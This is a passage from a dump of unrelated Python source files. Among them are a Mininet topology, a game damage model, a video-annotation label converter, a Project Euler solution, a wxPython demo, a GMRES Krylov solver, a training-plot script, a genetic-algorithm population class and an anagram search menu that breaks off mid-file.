defaultRoute=\"server-eth0\")\n h10 = self.addHost('untrusted',mac='00:00:00:00:00:10',ip='172.16.10.100/24', defaultRoute=\"untrusted-eth0\")\n\n # Create a switch. No changes here from Lab 1.\n # must use convention switch names s#\n s1 = self.addSwitch('s1') #floor 1 switch 1\n s2 = self.addSwitch('s2') #floor 1 switch 2\n s3 = self.addSwitch('s3') #floor 2 switch 1\n s4 = self.addSwitch('s4') #floor 2 switch 2\n s5 = self.addSwitch('s5') #data center switch \n s6 = self.addSwitch('s6') #core\n \n # Connect Port 8 on the Switch to Port 0 on Host 1 and Port 9 on the Switch to Port 0 on \n # Host 2. This is representing the physical port on the switch or host that you are \n # connecting to.\n \n #links h1,h2,s1 to core\n self.addLink(h1,s1,port1=0, port2=1)\n self.addLink(h2,s1,port1=0, port2=2)\n self.addLink(s6,s1,port1=1, port2=3)\n #links h3,h4,s2 to core \n self.addLink(h3,s2,port1=0, port2=1)\n self.addLink(h4,s2,port1=0, port2=2)\n self.addLink(s6,s2,port1=2, port2=3)\n #links h5,h6,s3 to core\n self.addLink(h5,s3,port1=0, port2=1)\n self.addLink(h6,s3,port1=0, port2=2)\n self.addLink(s6,s3,port1=3, port2=3)\n #links h7,h8,s4 to core\n self.addLink(h7,s4,port1=0, port2=1)\n self.addLink(h8,s4,port1=0, port2=2)\n self.addLink(s6,s4,port1=4, port2=3)\n #links server->data center-> core\n self.addLink(h9,s5,port1=0, port2=1)\n self.addLink(s6,s5,port1=6, port2=3)\n #links untrusted-> core\n self.addLink(h10,s6,port1=0, port2=5)\n print('Topology made')\n\ndef configure():\n topo = final_topo()\n #net = Mininet(topo=topo)\n net = Mininet(topo=topo, controller=RemoteController)\n net.start()\n\n CLI(net)\n \n net.stop()\n\n\nif __name__ == '__main__':\n configure()\n","sub_path":"final_skel.py","file_name":"final_skel.py","file_ext":"py","file_size_in_byte":3297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"285398474","text":"class DamageDistributionModel():\n '''\n Empty structure base class for damage distribution\n '''\n def apply_damage(self, fleet, attack_list):\n '''\n Choose which ships in fleet to attack with list of attacks\n attack_list is tuple (adjusted roll value, damage value)\n '''\n return NotImplemented\n\n def calculate_threat(self, ship):\n '''\n Calculates the threat of a given ship\n '''\n return NotImplemented\n \nclass DefaultDamageDistributionModel(DamageDistributionModel):\n '''\n Default model to choose how to apply damage to a fleet\n\n fleet.shiplist is a list of all ships in fleet\n attack_list is an array of tuples (roll, aim, damage) sorted by highest damage first\n '''\n def apply_damage(self, fleet, attack_list):\n # Sort ships by threat level, then by hull\n ships = []\n for ship in fleet.shiplist:\n ships.append((ship, self.calculate_threat(ship), ship.get_hp()))\n\n ships.sort(key=lambda ship:ship[2], reverse=True)\n ships.sort(key=lambda ship:ship[1], reverse=True)\n\n # Run attacks\n for atk in attack_list:\n used = False # boolean if attack has been used\n if atk[0] == 1:\n continue # ignore 1 rolls\n\n # Check if can one shot\n for ship in ships:\n if not ship[0].is_alive() or ship[1] == 0:\n continue # Skip dead ships and skip ships with no threat\n\n # Check if roll can hit ship\n if atk[0] == 6 or atk[0] + atk[1] - ship[0].get_shield() >= 6:\n # Check if can one shot\n if ship[0].get_hp() <= atk[2]:\n # Damage ship\n ship[0].take_damage(atk[2])\n used = True\n break # break out of ship for loop and move to next attack if it exists\n\n # Hit first ship can hit\n if not used:\n for ship in ships:\n if not ship[0].is_alive():\n continue # skip dead ships\n # Check if roll can hit ship\n if atk[0] == 6 or atk[0] + atk[1] - ship[0].get_shield() >= 6:\n # Damage ship\n ship[0].take_damage(atk[2])\n used = True\n break # break out of ship for loop and move to next attack if it exists\n\n def calculate_threat(self, ship):\n '''\n Default threat level is calculated damage per turn\n '''\n aim = 1\n damage = 0\n for part in ship.parts:\n aim += part.aim\n damage += part.weapon_damage\n\n if aim > 5:\n aim = 5\n\n return damage * (aim / 6.0) # aim / 6.0 should be estimated hit chance\n\nif __name__ == '__main__':\n import ships\n ship = ships.CreateShip(\"Cruiser\", \"hull,blank,ion_cannon,nuclear_source,electron_computer,nuclear_drive\")\n model = DefaultDamageDistributionModel()\n print(model.calculate_threat(ship))","sub_path":"src/damage_models.py","file_name":"damage_models.py","file_ext":"py","file_size_in_byte":3108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"462061661","text":"import os\nimport shutil\nimport argparse\nimport logging\nfrom flip_utils import flip_samples\n\nto_id = 0\n\n\ndef _parse_args():\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"--annotated-base-path\", type=str,\n default=\"/ssd4/zhangyiyang/data/AR/annotated/0426\")\n parser.add_argument(\"--category-file-path\", type=str,\n default=\"/ssd4/zhangyiyang/data/AR/label/category.txt\")\n\n # from labels & from frames\n parser.add_argument(\"--from-labels-file-path\", type=str,\n default=\"/ssd4/zhangyiyang/data/AR/annotated/0426/from_label.txt\")\n parser.add_argument(\"--from-frames-dir\", type=str,\n default=\"/ssd4/zhangyiyang/tomcat9/webapps/annotation-tool/input/video\")\n parser.add_argument(\"--from-img-format\", type=str, default=\"{:05d}.jpg\")\n parser.add_argument(\"--from-time-interval\", type=float, default=.1)\n\n # to frames\n parser.add_argument(\"--to-frames-dir-name\", type=str, default=\"frames\")\n parser.add_argument(\"--to-labels-file-name\",\n type=str, default=\"to_label.txt\")\n parser.add_argument(\"--to-labels-file-append\", action=\"store_true\")\n parser.add_argument(\"--global-to-labels-dir\", type=str,\n default=\"/ssd4/zhangyiyang/data/AR/label/summary\")\n parser.add_argument(\"--to-img-format\", type=str, default=\"{:05d}.jpg\")\n parser.add_argument(\"--to-time-interval\", type=float, default=.1)\n\n # flip\n parser.add_argument(\"--flip\", action=\"store_true\")\n parser.add_argument(\"--flip-frames-dir-name\", type=str,\n default=\"flip_frames\")\n parser.add_argument(\"--flip-to-labels-file-name\",\n type=str, default=\"flip_to_label.txt\")\n\n return parser.parse_args()\n\n\ndef _handle_one_file(from_label_file_path, to_file, category_to_id,\n from_time_interval, from_frames_dir, from_img_format,\n to_time_interval, to_frames_dir, to_img_format,):\n # 判断文件是否存在\n logging.info(\"start processing {}\".format(from_label_file_path))\n if not os.path.exists(from_label_file_path):\n logging.warn(\"{} doesn't exists\".format(from_label_file_path))\n return\n\n # 设置输出样本编号,全局变量的形式保存\n global to_id\n\n # 设置原始图像帧与当前帧之间的相对关系\n inner_interval = int(\n round(to_time_interval / from_time_interval, 0))\n\n # 设置当前样本帧\n to_time_interval = int(round(to_time_interval * 10, 0))\n\n # 读取标注结果文件,并删除第一行\n with open(from_label_file_path, \"r\") as f:\n lines = f.readlines()\n lines = [l.strip() for l in lines]\n lines.pop(0)\n\n # 分别读取标注结果的每一行,一行代表一个TSM样本\n for idx, line in enumerate(lines):\n # 读取行信息\n splits = line.split(\",\")\n from_id = splits[0]\n t1 = int(round(float(splits[4]) * 10, 0))\n t2 = int(round(float(splits[5]) * 10, 0))\n label = splits[3]\n\n # 获取原始图像帧中的编号\n from_ids = [(t1 + i * to_time_interval) * inner_interval\n for i in range(100)\n if (t1 + i * to_time_interval) * inner_interval <= t2]\n\n # 准备复制文件\n from_frame_path = os.path.join(from_frames_dir, from_id)\n to_frame_path = os.path.join(to_frames_dir, str(to_id))\n to_id += 1\n if not os.path.exists(from_frame_path):\n print(\"from frame path {} doesn't exist\".format(from_frame_path))\n continue\n if not os.path.exists(to_frame_path):\n os.makedirs(to_frame_path)\n\n # 复制图片,并重新编号\n for to_idx, from_idx in enumerate(from_ids):\n # 得到的编号是从0开始的,但视频提取帧的图片编号是从1开始的\n from_img = os.path.join(\n from_frame_path,\n str(from_img_format).format(from_idx+1))\n to_img = os.path.join(\n to_frame_path, str(to_img_format).format(to_idx+1))\n if os.path.exists(from_img):\n shutil.copyfile(from_img, to_img)\n else:\n print(\"error copy {} to {}\".format(from_img, to_img))\n\n # 输出文件中添加行\n label_id = category_to_id[label]\n to_frame_path\n frame_cnt = len(from_ids)\n to_file.write(to_frame_path + \" \" + str(frame_cnt) +\n \" \" + str(label_id) + \"\\n\")\n\n\ndef _get_start_id(cur_dir):\n max_id = 0\n for file_name in os.listdir(cur_dir):\n try:\n idx = int(file_name)\n max_id = max(idx, max_id)\n except:\n pass\n return max_id + 1\n\n\ndef main(args):\n assert args.from_time_interval <= args.to_time_interval\n assert os.path.exists(args.annotated_base_path)\n\n to_frames_dir = os.path.join(\n args.annotated_base_path,\n args.to_frames_dir_name,\n )\n if not os.path.exists(to_frames_dir):\n os.makedirs(to_frames_dir)\n\n global to_id\n to_id = _get_start_id(to_frames_dir)\n\n # 1. 获取样本标签字典\n with open(args.category_file_path, \"r\") as f:\n categories = f.readlines()\n categories = [c.replace(\"\\n\", \"\") for c in categories]\n category_to_id = {c: idx for idx, c in enumerate(categories)}\n\n # 2. 构建输出结果文件\n to_labels_file_path = os.path.join(\n args.annotated_base_path,\n args.to_labels_file_name,\n )\n if args.to_labels_file_append:\n to_file = open(to_labels_file_path, \"a\")\n else:\n to_file = open(to_labels_file_path, \"w\")\n\n # 3. 进行 from label 到 to label 的转换\n _handle_one_file(args.from_labels_file_path, to_file, category_to_id,\n args.from_time_interval,\n args.from_frames_dir,\n args.from_img_format,\n args.to_time_interval,\n to_frames_dir,\n args.to_img_format)\n to_file.close()\n\n # 4. flip\n flip_to_frames_dir = os.path.join(\n args.annotated_base_path,\n args.flip_frames_dir_name,\n )\n if not os.path.exists(flip_to_frames_dir):\n os.makedirs(flip_to_frames_dir)\n if args.flip:\n flip_samples(\n to_labels_file_path,\n os.path.join(args.annotated_base_path,\n args.flip_to_labels_file_name),\n flip_to_frames_dir\n )\n\n # 5. 复制 to label 文件到to-labels-file-path\n shutil.copy(to_labels_file_path,\n os.path.join(args.global_to_labels_dir,\n os.path.basename(args.annotated_base_path)\n + \"_annotated_to_labels.txt\"))\n if args.flip:\n shutil.copy(to_labels_file_path,\n os.path.join(args.global_to_labels_dir,\n os.path.basename(args.annotated_base_path)\n + \"_annotated_flip_to_labels.txt\"))\n\n\nif __name__ == '__main__':\n main(_parse_args())\n","sub_path":"src/annotated_labels_to_labels.py","file_name":"annotated_labels_to_labels.py","file_ext":"py","file_size_in_byte":7124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"538494962","text":"import timeit\nimport decimal\n\n\ndef solution():\n sqrts = get_irrational_square_roots()\n return sum([get_digital_sum(sqrt) for sqrt in sqrts])\n\n\ndef get_irrational_square_roots():\n sqrts = []\n for i in range(0,100):\n decimal.getcontext().prec = 102\n sqrt = decimal.Decimal(i).sqrt()\n if sqrt % 1:\n sqrts.append(sqrt)\n return sqrts\n\n\ndef get_digital_sum(sqrt):\n sqrt = str(sqrt).replace('.', '')[:100]\n lenS = len(sqrt)\n sum = 0\n for i in range(0, lenS):\n sum += int(sqrt[i])\n return sum\n\n\ndef solution2():\n decimal.getcontext().prec = 102\n L, d, s = 100, 100, 0\n p = pow(10, d-1)\n\n for z in range(2, L):\n q = decimal.Decimal(z).sqrt()\n s += sum(int(c) for c in str(q * p)[:d]) if q % 1 != 0 else 0\n\n return s\n\n\nif __name__==\"__main__\":\n for f in [solution, solution2]:\n start = timeit.default_timer()\n\n print(f())\n\n stop = timeit.default_timer()\n print(\"Time: \", stop - start, \" s\")","sub_path":"080_square_root_digital_expansion.py","file_name":"080_square_root_digital_expansion.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"153948740","text":"#----------------------------------------------------------------------\n\nilabel = \"horizontal structured mesh definition \"\njlabel = \"vertical structured mesh definition \"\nlabel2 = \"Click here to hide pane\"\n\nbtnlbl1 = \"call Expand(True)\"\nbtnlbl2 = \"call Expand(False)\"\n\nimport wx\n\nclass TestPanel(wx.Panel):\n def __init__(self, parent, log):\n self.log = log\n wx.Panel.__init__(self, parent, -1)\n\n title = wx.StaticText(self, label=\"structured mesh definition\")\n title.SetFont(wx.Font(12, wx.SWISS, wx.NORMAL, wx.BOLD))\n title.SetForegroundColour(\"blue\")\n\n self.cp = cp = wx.CollapsiblePane(self, label=ilabel,\n style=wx.CP_DEFAULT_STYLE|wx.CP_NO_TLW_RESIZE)\n self.Bind(wx.EVT_COLLAPSIBLEPANE_CHANGED, self.OnPaneChanged, cp)\n self.IMeshControl(cp.GetPane())\n\n self.cp2 = cp2 = wx.CollapsiblePane(self, label=jlabel,\n style=wx.CP_DEFAULT_STYLE|wx.CP_NO_TLW_RESIZE)\n self.Bind(wx.EVT_COLLAPSIBLEPANE_CHANGED, self.OnPaneChanged, cp2)\n self.IMeshControl(cp2.GetPane())\n\n sizer = wx.BoxSizer(wx.VERTICAL)\n self.SetSizer(sizer)\n sizer.Add(title, 0, wx.ALL, 30)\n sizer.Add(cp, 0, wx.RIGHT|wx.LEFT|wx.EXPAND, 50)\n pSizer = wx.BoxSizer(wx.VERTICAL)\n sizer.Add(pSizer, 0, wx.ALIGN_CENTER_HORIZONTAL|wx.LEFT|wx.EXPAND,50)\n sizer.Add((30,40))\n sizer.Add(cp2, 0, wx.RIGHT|wx.LEFT|wx.EXPAND, 50)\n\n def OnPaneChanged(self, cp,evt=None):\n if evt:\n self.log.write('wx.EVT_COLLAPSIBLEPANE_CHANGED: %s' % evt.Collapsed)\n\n # redo the layout\n self.Layout()\n \n\n def IMeshControl(self, pane):\n \n addrSizer = wx.FlexGridSizer(rows = 3,cols=1, hgap=5, vgap=5)\n addrSizer.AddGrowableCol(1)\n# iext = wx.StaticText(pane, -1, \"horizontal ext.:\")\n# addrSizer.Add(iext, -1,wx.ALIGN_LEFT|wx.ALIGN_CENTER_VERTICAL)\n \n extSizer = wx.BoxSizer(wx.HORIZONTAL)\n cst0Lbl = wx.StaticText(pane, -1, \"I nb cells/zone:\",size=(150,20))\n extSizer.Add(cst0Lbl, -1,wx.ALIGN_LEFT|wx.ALIGN_CENTER_VERTICAL)\n self.i1 = i1 = wx.TextCtrl(pane, -1, \"1\", size=(50,-1));extSizer.Add(i1, 0, wx.ALIGN_LEFT|wx.RIGHT, 1)\n self.i2 = i2 = wx.TextCtrl(pane, -1, \"0\", size=(50,-1));extSizer.Add(i2, 0, wx.LEFT|wx.RIGHT, 1)\n self.i3 = i3 = wx.TextCtrl(pane, -1, \"0\", size=(50,-1));extSizer.Add(i3, 0, wx.LEFT|wx.RIGHT, 1)\n self.i4 = i4 = wx.TextCtrl(pane, -1, \"0\", size=(50,-1));extSizer.Add(i4, 0, wx.LEFT|wx.RIGHT, 1)\n self.i5 = i5 = wx.TextCtrl(pane, -1, \"0\", size=(50,-1));extSizer.Add(i5, 0, wx.LEFT|wx.RIGHT, 1)\n self.i6 = i6 = wx.TextCtrl(pane, -1, \"0\", size=(50,-1));extSizer.Add(i6, 0, wx.LEFT|wx.RIGHT, 1)\n self.i7 = i7 = wx.TextCtrl(pane, -1, \"0\", size=(50,-1));extSizer.Add(i7, 0, wx.LEFT|wx.RIGHT, 1)\n self.i8 = i8 = wx.TextCtrl(pane, -1, \"0\", size=(50,-1));extSizer.Add(i8, 0, wx.LEFT|wx.RIGHT, 1)\n \n addrSizer.Add(extSizer, 0, wx.ALIGN_LEFT|wx.ALL)\n \n cst1Lbl = wx.StaticText(pane, -1, \"I pt distribution coeff.:\",size=(150,20))\n powSizer = wx.BoxSizer(wx.HORIZONTAL)\n powSizer.Add(cst1Lbl, -1,wx.ALIGN_LEFT|wx.ALIGN_CENTER_VERTICAL)\n self.p1 = p1 = wx.TextCtrl(pane, -1, \"1.\", size=(50,-1));powSizer.Add(p1, 0, wx.LEFT|wx.RIGHT, 1)\n self.p2 = p2 = wx.TextCtrl(pane, -1, \"1.\", size=(50,-1));powSizer.Add(p2, 0, wx.LEFT|wx.RIGHT, 1)\n self.p3 = p3 = wx.TextCtrl(pane, -1, \"1.\", size=(50,-1));powSizer.Add(p3, 0, wx.LEFT|wx.RIGHT, 1)\n self.p4 = p4 = wx.TextCtrl(pane, -1, \"1.\", size=(50,-1));powSizer.Add(p4, 0, wx.LEFT|wx.RIGHT, 1)\n self.p5 = p5 = wx.TextCtrl(pane, -1, \"1.\", size=(50,-1));powSizer.Add(p5, 0, wx.LEFT|wx.RIGHT, 1)\n self.p6 = p6 = wx.TextCtrl(pane, -1, \"1.\", size=(50,-1));powSizer.Add(p6, 0, wx.LEFT|wx.RIGHT, 1)\n self.p7 = p7 = wx.TextCtrl(pane, -1, \"1.\", size=(50,-1));powSizer.Add(p7, 0, wx.LEFT|wx.RIGHT, 1)\n self.p8 = p8 = wx.TextCtrl(pane, -1, \"1.\", size=(50,-1));powSizer.Add(p8, 0, wx.LEFT|wx.RIGHT, 1)\n# addrSizer.Add(powSizer, 0, wx.ALIGN_LEFT|wx.ALIGN_CENTER_HORIZONTAL, 5 )\n addrSizer.Add(powSizer, 0, wx.ALIGN_CENTER_HORIZONTAL|wx.LEFT|wx.EXPAND)\n border = wx.BoxSizer()\n border.Add(addrSizer, 1, wx.EXPAND|wx.ALL, 5)\n pane.SetSizer(border)\n \n \n# def _onOk(self, params):\n def _onOk(self):\n pass\n\n#----------------------------------------------------------------------\n\ndef runTest(frame, nb, log):\n win = TestPanel(nb, log)\n return win\n\n#----------------------------------------------------------------------\n\n\n\noverview = \"\"\"\n

wx.CollapsiblePane

\n\nA collapsable panel is a container with an embedded button-like\ncontrol which can be used by the user to collapse or expand the pane's\ncontents.\n\n\n\"\"\"\n\n\n\nif __name__ == '__main__':\n import sys,os\n import run\n run.main(['', os.path.basename(sys.argv[0])] + sys.argv[1:])\n\n\n","sub_path":"Api/toto.py","file_name":"toto.py","file_ext":"py","file_size_in_byte":5110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"17746267","text":"\"\"\"Krylov iterator solver\"\"\"\n\nimport logging\nimport os\n\nimport numpy as np\n\nfrom .model_config import get_region_cnt\nfrom .model_state_base import lin_comb\nfrom .region_scalars import to_ndarray, to_region_scalar_ndarray\nfrom .solver_state import SolverState, action_step_log_wrap\nfrom .utils import class_name, mkdir_exist_okay\n\n\nclass KrylovSolver:\n \"\"\"\n class for applying a Krylov method to approximate the solution of a system of linear\n equations\n\n The specific Krylov method used is Left-Preconditioned GMRES, algorithm 9.4 of\n 'Iterative Methods for Sparse Linear Systems, 2nd Edition', Yousef Saad, available\n at https://www-users.cs.umn.edu/~saad/books.html.\n\n The solver is applied to A x = -fcn, where A is\n comp_jacobian_fcn_state_prod evaluated at iterate.\n\n Assumes x0 = 0.\n \"\"\"\n\n def __init__(self, iterate, workdir, resume, rewind, hist_fname):\n \"\"\"initialize Krylov solver\"\"\"\n logger = logging.getLogger(__name__)\n logger.debug(\n 'KrylovSolver, workdir=\"%s\", resume=\"%r\", rewind=\"%r\", hist_fname=\"%s\"',\n workdir,\n resume,\n rewind,\n hist_fname,\n )\n\n # ensure workdir exists\n mkdir_exist_okay(workdir)\n\n self._workdir = workdir\n self._solver_state = SolverState(\"Krylov\", workdir, resume, rewind)\n\n iterate.gen_precond_jacobian(\n hist_fname,\n precond_fname=self._fname(\"precond\", iteration=0),\n solver_state=self._solver_state,\n )\n\n def _fname(self, quantity, iteration=None):\n \"\"\"construct fname corresponding to particular quantity\"\"\"\n if iteration is None:\n iteration = self._solver_state.get_iteration()\n return os.path.join(self._workdir, \"%s_%02d.nc\" % (quantity, iteration))\n\n def converged(self):\n \"\"\"is solver converged\"\"\"\n return self._solver_state.get_iteration() >= 3\n\n @action_step_log_wrap(step=\"KrylovSolver._solve0\", per_iteration=False)\n # pylint: disable=unused-argument\n def _solve0(self, fcn, solver_state):\n \"\"\"\n steps of solve that are only performed for iteration 0\n This is step 1 of Saad's alogrithm 9.4.\n \"\"\"\n # assume x0 = 0, so r0 = M.inv*(rhs - A*x0) = M.inv*rhs = -M.inv*fcn\n precond_fcn = fcn.apply_precond_jacobian(\n self._fname(\"precond\", 0), self._fname(\"precond_fcn\"), self._solver_state\n )\n beta = precond_fcn.norm()\n caller = class_name(self) + \"._solve0\"\n (-precond_fcn / beta).dump(self._fname(\"basis\"), caller)\n self._solver_state.set_value_saved_state(\"beta_ndarray\", to_ndarray(beta))\n\n def solve(self, res_fname, iterate, fcn):\n \"\"\"apply Krylov method\"\"\"\n logger = logging.getLogger(__name__)\n logger.debug('res_fname=\"%s\"', res_fname)\n\n self._solve0(fcn, solver_state=self._solver_state)\n\n caller = class_name(self) + \".solve\"\n\n while True:\n j_val = self._solver_state.get_iteration()\n h_mat = to_region_scalar_ndarray(\n np.zeros(\n (\n len(iterate.tracer_modules),\n j_val + 2,\n j_val + 1,\n get_region_cnt(),\n )\n )\n )\n if j_val > 0:\n h_mat[:, :-1, :-1] = to_region_scalar_ndarray(\n self._solver_state.get_value_saved_state(\"h_mat_ndarray\")\n )\n basis_j = type(iterate)(self._fname(\"basis\"))\n w_raw = iterate.comp_jacobian_fcn_state_prod(\n fcn, basis_j, self._fname(\"w_raw\"), self._solver_state\n )\n w_j = w_raw.apply_precond_jacobian(\n self._fname(\"precond\", 0), self._fname(\"w\"), self._solver_state\n )\n h_mat[:, :-1, -1] = w_j.mod_gram_schmidt(j_val + 1, self._fname, \"basis\")\n h_mat[:, -1, -1] = w_j.norm()\n w_j /= h_mat[:, -1, -1]\n h_mat_ndarray = to_ndarray(h_mat)\n self._solver_state.set_value_saved_state(\"h_mat_ndarray\", h_mat_ndarray)\n\n # solve least-squares minimization problem for each tracer module\n coeff_ndarray = self.comp_krylov_basis_coeffs(h_mat_ndarray)\n iterate.log_vals(\"KrylovCoeff\", coeff_ndarray)\n\n # construct approximate solution\n res = lin_comb(\n type(iterate),\n to_region_scalar_ndarray(coeff_ndarray),\n self._fname,\n \"basis\",\n )\n res.dump(self._fname(\"krylov_res\", j_val), caller)\n\n if self.converged():\n break\n\n self._solver_state.inc_iteration()\n w_j.dump(self._fname(\"basis\"), caller)\n\n return res.dump(res_fname, caller)\n\n def comp_krylov_basis_coeffs(self, h_mat_ndarray):\n \"\"\"solve least-squares minimization problem for each tracer module\"\"\"\n h_shape = h_mat_ndarray.shape\n coeff_ndarray = np.zeros((h_shape[0], h_shape[2], h_shape[3]))\n lstsq_rhs = np.zeros(h_shape[1])\n beta_ndarray = self._solver_state.get_value_saved_state(\"beta_ndarray\")\n for tracer_module_ind in range(h_shape[0]):\n for region_ind in range(h_shape[3]):\n lstsq_rhs[0] = beta_ndarray[tracer_module_ind, region_ind]\n coeff_ndarray[tracer_module_ind, :, region_ind] = np.linalg.lstsq(\n h_mat_ndarray[tracer_module_ind, :, :, region_ind],\n lstsq_rhs,\n rcond=None,\n )[0]\n return coeff_ndarray\n","sub_path":"src/krylov_solver.py","file_name":"krylov_solver.py","file_ext":"py","file_size_in_byte":5688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"57019642","text":"import sys\nsys.path[0] += '/../'\n\nfrom collections import defaultdict\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom Grader.helpers import get_threshold\nfrom experiments.helpers import read_training_data\n\n\nPLOT_COLORS = {'aug-gen': 'lightskyblue', 'base': 'lightcoral', 'baseline': 'grey', 'bach': 'steelblue'}\nPLOT_LABELS = {'aug-gen': 'Aug. Gen.', 'base': 'Base', 'baseline': 'Baseline'}\n\naug_gen_dir = 'models/aug-gen_06-04_23:10'\nbase_dir = 'models/base_06-02_06:55'\nbaseline_dir = 'models/base_06-03_00:00'\n\ndef main():\n dir_dict = {'aug-gen': aug_gen_dir, 'base': base_dir, 'baseline': baseline_dir}\n plot_median_grade_per_epoch(dir_dict, num_epochs=40)\n\ndef plot_median_grade_per_epoch(dir_dict, num_epochs):\n median_dict = defaultdict(lambda: [0]*num_epochs)\n for model_label, model_path in dir_dict.items():\n data_dict = read_training_data(data_file=f'{model_path}/grades.csv', feature='grade')\n for epoch, grades in data_dict.items():\n if epoch < num_epochs:\n median_dict[model_label][epoch] = np.median(grades)\n\n plt.figure()\n plt.style.use('seaborn-whitegrid')\n fig, ax = plt.subplots()\n ax.grid(False)\n thres = get_threshold(\n data_file='experiments/ablations/reg_pe_no_oe/bach_grades.csv',\n column='grade',\n aggregate='75p',\n )\n plt.axhline(y=thres, dashes=(2,2), label='Lowest Bach\\ngrade threshold', color=PLOT_COLORS['bach'])\n xlim = range(num_epochs)\n for model_label, median_grades in median_dict.items():\n plt.plot(xlim, median_grades[:num_epochs], label=PLOT_LABELS[model_label], color=PLOT_COLORS[model_label])\n plt.title('Median Grade of Generations During Training')\n ax.set_xticks([i+1 for i in xlim])\n ax.set_xticklabels([str(i) for i in xlim])\n for label in ax.get_xaxis().get_ticklabels()[1::2]:\n label.set_visible(False)\n # plt.legend(loc='right')\n handles, labels = ax.get_legend_handles_labels()\n lgd = ax.legend(handles, labels, loc='upper center', bbox_to_anchor=(-0.2,0.5))\n plt.ylabel('Grade')\n plt.xlabel('Epoch')\n plt.savefig('plots/median_grades_per_epoch.png', bbox_inches='tight')\n\n\nif __name__ == '__main__':\n main()","sub_path":"experiments/compare_training.py","file_name":"compare_training.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"470788237","text":"#\n# Population.py\n#\n#\n\nimport copy\nimport math\nfrom operator import attrgetter\nfrom Individual import *\nfrom Worker import *\nfrom multiprocessing import Pool\n\n\nclass Population:\n \"\"\"\n Population\n \"\"\"\n uniprng=None\n crossoverFraction=None\n \n def __init__(self, populationSize):\n \"\"\"\n Population constructor\n \"\"\"\n self.population=[]\n for i in range(populationSize):\n self.population.append(Individual()) \n\n def __len__(self):\n return len(self.population)\n \n def __getitem__(self,key):\n return self.population[key]\n \n def __setitem__(self,key,newValue):\n self.population[key]=newValue\n \n def copy(self):\n return copy.deepcopy(self)\n \n def evaluateFitness(self,pobj):\n states=[ind.x for ind in self.population]\n fitnesses=pobj.map(Worker.evaluateFitnessPool,states)\n for i in range(len(self.population)): self.population[i].fit=fitnesses[i]\n #for individual in self.population: individual.evaluateFitness() \n \n def mutate(self): \n for individual in self.population:\n individual.mutate()\n \n def crossover(self):\n if (self.startCity==0):\n indexList1=list(range(len(self)))\n indexList2=list(range(len(self)))\n else:\n indexList1=list(range(1,len(self)))\n indexList2=list(range(1,len(self)))\n \n self.uniprng.shuffle(indexList1)\n self.uniprng.shuffle(indexList2)\n\n\n if self.crossoverFraction == 1.0: \n for index1,index2 in zip(indexList1,indexList2):\n self[index1].crossover(self[index2])\n else:\n for index1,index2 in zip(indexList1,indexList2):\n rn=self.uniprng.random()\n if rn < self.crossoverFraction:\n self[index1].crossover(self[index2]) \n\n \n def conductTournament(self):\n # binary tournament\n indexList1=list(range(len(self)))\n indexList2=list(range(len(self)))\n \n self.uniprng.shuffle(indexList1)\n self.uniprng.shuffle(indexList2)\n \n # do not allow self competition\n for i in range(len(self)):\n if indexList1[i] == indexList2[i]:\n temp=indexList2[i]\n if i == 0:\n indexList2[i]=indexList2[-1]\n indexList2[-1]=temp\n else:\n indexList2[i]=indexList2[i-1]\n indexList2[i-1]=temp\n \n #compete\n newPop=[] \n for index1,index2 in zip(indexList1,indexList2):\n if self[index1].fit < self[index2].fit:\n newPop.append(copy.deepcopy(self[index1]))\n elif self[index1].fit > self[index2].fit:\n newPop.append(copy.deepcopy(self[index2]))\n else:\n rn=self.uniprng.random()\n if rn > 0.5:\n newPop.append(copy.deepcopy(self[index1]))\n else:\n newPop.append(copy.deepcopy(self[index2]))\n \n # overwrite old pop with newPop \n self.population=newPop \n\n\n def combinePops(self,otherPop):\n self.population.extend(otherPop.population)\n\n def truncateSelect(self,newPopSize):\n #sort by fitness\n self.population.sort(key=attrgetter('fit'),reverse=False)\n \n #then truncate the bottom\n self.population=self.population[:newPopSize] \n \n def __str__(self):\n s=''\n for ind in self:\n s+=str(ind) + '\\n'\n return s\n\n\n \n \n","sub_path":"Population.py","file_name":"Population.py","file_ext":"py","file_size_in_byte":3861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"369485710","text":"\"\"\"\nAnagram Searcher\n\nFinds anagrams of given input, based on given strings and files. \n\"\"\"\n\n__author__ = \"Nicholas Chua\"\n__docformat__ = 'reStructuredText'\n__since__ = '28/06/2013'\n__modified__ = '11/06/2020'\n\nfrom binary_search_list_tree import BinarySearchListTree\nimport sys\n\ndef read_from_file(filename: str, my_tree: BinarySearchListTree[str, str]) -> None:\n with open(filename, 'r') as f:\n for line in f:\n line = line.strip()\n if line.isalpha():\n sorted_string = \"\".join(sorted(line.lower()))\n print(\"Inserting:\", line, \"->\", sorted_string)\n # TODO: Add word to my_tree\n my_tree[sorted_string] = line\n else:\n print(\"Error: Input string %s from file %s\" % (line, filename))\n\ndef menu() -> None:\n my_tree = BinarySearchListTree()\n quit_program = False\n options = [\"Prac7 Anagram Tree Menu Options:\",\n \"Read String\",\n \"Read File\",\n \"List\",\n \"Search\",\n \"Anagram\",\n \"Quit\"]\n\n while not quit_program:\n print()\n for i, option in enumerate(options):\n optnum = \"%d. \" % i if i > 0 else \"\"\n print(optnum, option, sep=\"\")\n\n command = input(\"Please press a number, then : \").strip()\n\n if command == \"1\": # Read string\n input_string = input(\"Please enter a string: \").strip()\n if input_string.isalpha():\n sorted_string = \"\".join(sorted(input_string.lower()))\n print(\"Inserting:\", input_string, \"->\", sorted_string)\n # TODO: Add string to my_tree\n my_tree[sorted_string] = input_string\n else:\n print(\"ERROR: String not alphanumerical or zero length\")\n\n elif command == \"2\": # Read file\n filename = input(\"Filename: \")\n try:\n read_from_file(filename, my_tree)\n except 